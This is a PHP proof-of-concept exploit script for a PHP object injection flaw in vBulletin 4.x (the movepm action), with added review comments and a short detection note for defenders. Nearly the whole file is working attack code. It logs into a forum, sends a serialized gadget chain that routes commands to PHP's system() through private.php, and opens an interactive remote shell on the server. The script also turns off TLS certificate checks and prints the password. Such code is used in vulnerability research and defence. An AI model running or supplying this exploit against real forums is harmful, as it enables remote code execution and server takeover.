<?php
/*
---------------------------------------------------------
vBulletin 4.x (movepm) PHP Object Injection Vulnerability
---------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://www.vbulletin.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Technical Writeup:
https://karmainsecurity.com/riding-the-time-machine-old-vbulletin-php-object-injection
*/
// Script bootstrap: banner, environment check and CLI argument check.
// No execution time limit; only fatal errors are reported, so cURL/PCRE warnings are silent.
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+-------------------------------------------------------------+";
print "\n| vBulletin 4.x (movepm) PHP Object Injection Exploit by EgiX |";
print "\n+-------------------------------------------------------------+\n";
// Every HTTP request below goes through the cURL extension, so bail out early if it is missing.
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
// Exactly three arguments: base URL, username, password. The URL must end with a slash,
// because the paths below are appended to it verbatim (e.g. "{$url}admincp/index.php").
if ($argc != 4)
{
print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n";
print "\nExample....: php $argv[0] http://localhost/vb4/ egix password";
print "\nExample....: php $argv[0] https://vbulletin.com/ hacker pwned\n\n";
die();
}
// Gadget class: a local stand-in for vBulletin's vB_Database that carries only the one
// property the serialized chain needs. Only the serialized shape matters; no method of
// this class is ever invoked on the client side.
// NOTE(review): the "free_result" => "system" entry is presumably looked up as a callable
// by the application when the injected object is torn down — the server-side sink is not
// visible in this file; see the writeup linked in the header.
class vB_Database
{
public $functions = array("free_result" => "system");
}
// Gadget class: local stand-in for vBulletin's vB_dB_Result. Holds the vB_Database gadget
// in $db and the attacker-supplied command string in $recordset, so that after
// deserialization on the server the two end up paired inside one object.
class vB_dB_Result
{
protected $db, $recordset;
// @param string $cmd command string built by the interactive loop at the bottom of the file
function __construct($cmd)
{
$this->db = new vB_Database;
$this->recordset = $cmd;
}
}
// Gadget class: outermost object of the chain (this is what exec_cmd() serializes).
// $_segment_scheme wraps the vB_dB_Result gadget; $_validated_scheme is preset to true.
// NOTE(review): why this particular class and the true flag are required is decided by
// the application's own code paths, which are not shown here — see the writeup.
class vB_Route_Error
{
protected $_segment_scheme, $_validated_scheme = true;
// @param string $cmd command string forwarded to vB_dB_Result
function __construct($cmd)
{
$this->_segment_scheme = new vB_dB_Result($cmd);
}
}
/**
 * Sends one command through the object-injection chain and returns the raw response body.
 *
 * Uses three globals set by the top-level code: $ch (a cURL handle with a cookie jar that
 * already holds the login session), $url (forum base URL with trailing slash) and $token
 * (preg_match result whose index 1 is the SECURITYTOKEN value).
 *
 * Two requests are made: the first echoes the serialized chain back through the admincp
 * "postvars" hidden field, the second submits that echoed value to private.php as the
 * messageids parameter of the movepm action.
 *
 * @param string $cmd shell command to embed in the chain
 * @return string|false body of the private.php response, or false if curl_exec fails
 */
function exec_cmd($cmd)
{
global $ch, $url, $token;
// Serialize the gadget chain rooted at vB_Route_Error.
$chain = serialize(new vB_Route_Error($cmd));
// Wrap the chain as the "date" property of a serialized DateTime object, then base64 it.
// NOTE(review): the reason the DateTime wrapper is needed is not visible here; see the writeup.
$chain = base64_encode('O:8:"DateTime":1:{s:4:"date";'.$chain.'}');
// Request 1: POST to admincp/index.php with the base64 blob as the parameter *name* (value 1).
// The response is expected to reflect the submitted POST variables in a hidden "postvars" input.
curl_setopt($ch, CURLOPT_URL, "{$url}admincp/index.php");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([$chain => 1]));
// Extract the reflected postvars value; a failed curl_exec (false) also ends up here as "not found".
if (!preg_match('/name="postvars" value="([^"]+)"/', curl_exec($ch), $signed)) die("[-] postvars not found!\n\n");
// Request 2 parameters: movepm action, the page's security token, and messageids carrying the
// reflected value with a "B64:" prefix (HTML entities decoded first).
// Detection note for defenders: a private.php POST with do=movepm whose messageids starts with
// "B64:" and base64-decodes to serialized object notation (here 'O:8:"DateTime"') is the
// distinguishing request of this technique. The vulnerability class implies the application
// deserializes this field; confirm the exact sink against the patched vBulletin source.
$params = ["do" => "movepm", "securitytoken" => $token[1], "messageids" => "B64:" . html_entity_decode($signed[1])];
curl_setopt($ch, CURLOPT_URL, "{$url}private.php");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
// Raw body; the caller looks for its own end marker in it.
return curl_exec($ch);
}
// Main flow: log in, fetch the security token, then run the interactive command loop.
$url = $argv[1];
$user = $argv[2];
$pwd = $argv[3];
// Single cURL handle shared with exec_cmd() via global; the cookie jar keeps the session.
$ch = curl_init();
// Drop any stale cookie jar in the current directory; @ hides the warning when it does not exist.
@unlink("./cookies.txt");
curl_setopt($ch, CURLOPT_URL, "{$url}login.php");
curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// TLS certificate and hostname verification are both disabled: the client accepts any
// certificate, so the credentials sent below can be read by anyone on the path.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["do" => "login", "vb_login_username" => $user, "vb_login_password" => $pwd]));
// The cleartext password is echoed to stdout here.
print "\n[+] Performing login with username '{$user}' and password '{$pwd}'\n";
// Login "success" is only inferred from the username appearing somewhere in the response body,
// so an error page that echoes the submitted username would pass this check.
if (!strstr(curl_exec($ch), $user)) die("[-] Login failed!\n\n");
print "[+] Launching shell\n";
// GET private.php (POST switched off) to read the per-session SECURITYTOKEN; $token is
// left populated for exec_cmd(), which reads $token[1].
curl_setopt($ch, CURLOPT_URL, "{$url}private.php");
curl_setopt($ch, CURLOPT_POST, false);
if (!preg_match('/SECURITYTOKEN = "([^"]+)"/i', curl_exec($ch), $token)) die("[-] SECURITYTOKEN not found!\n\n");
// Interactive loop: one command per line until "exit" is typed.
// NOTE(review): fgets() returns false on EOF, which trim() turns into "" — that is not "exit",
// so a closed stdin does not end the loop; the == comparison is also loose (=== would be stricter).
while(1)
{
print "\nvBulletin-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
// Append a marker so the command output can be delimited inside the HTML response.
$cmd .= "; echo _______";
// Print everything up to the marker; no marker means the round trip failed and the script stops.
preg_match('/(.*)_______/s', exec_cmd($cmd), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}